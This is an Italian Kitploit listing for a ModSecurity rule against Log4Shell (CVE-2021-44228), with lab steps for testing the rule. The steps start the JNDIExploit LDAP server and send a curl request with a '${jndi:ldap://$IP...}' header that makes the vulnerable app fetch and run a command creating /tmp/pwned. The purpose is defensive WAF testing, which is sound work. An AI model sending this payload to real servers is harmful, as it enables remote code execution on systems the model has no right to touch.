Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
ModSec-log4j2 — Regola ModSec per protezione log4j2 - CVE-2021-44228 | Kitploit
Strumenti/GitHubGitHub/felipe8398/modsec-log4j2
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebBypass WAFPenetration TestingApprendimento e Formazione
GitHubfelipe8398/modsec-log4j2

ModSec-log4j2

Regola ModSec per protezione log4j2 - CVE-2021-44228

Vedi Repository
34 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Testare la regola di ModSec

Prerequisiti

  • Avere docker installato
  • Avere Java installato sulla propria macchina

Eseguire il test

  • Eseguire il git clone del repository
  • Eseguire il comando seguente per avviare il WAF (ModSec) e l'applicazione vulnerabile
root@kitploit:~
docker stack deploy -c docker-compose.yml WAF
  • Estrarre il file JNDIExploit.v1.2.zip che si trova nel repository, entrare nella cartella ed eseguire il comando seguente, dove $IP deve essere l'IP della propria macchina, non consiglio di usare 127.0.0.1
root@kitploit:~
java -jar ./JNDIExploit-1.2-SNAPSHOT.jar -i $IP -p 8888
  • Per testare la RCE eseguire il curl seguente sostituendo $IP con l'IP della propria macchina, creerà un file pwned all'interno di /tmp dell'applicazione vulnerabile
root@kitploit:~
curl 127.0.0.1:80 -H 'X-Api-Version: ${jndi:ldap://$IP:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}'

Domande degli universitari

1- Come sapere se il mio WAF e l'applicazione WEB vulnerabile sono stati avviati?

Scarica lo strumento

Eseguire docker service ls e verificare se ci sono due servizi ciascuno con una replica.

2- Come ottenere i log di modsec?

Eseguire docker exec -ti $(docker container ls | grep "felipe8398/redirector:latest"| awk '{print $1}') cat /var/log/apache2/error.log

3- Come verificare se la RCE non ha funzionato?

Il curl che abbiamo utilizzato crea un file chiamato pwned all'interno di tmp, quindi dobbiamo eseguire docker exec -ti $(docker container ls | grep ghcr.io/christophetd/log4shell-vulnerable-app:latest | awk '{print $1}') ls /tmp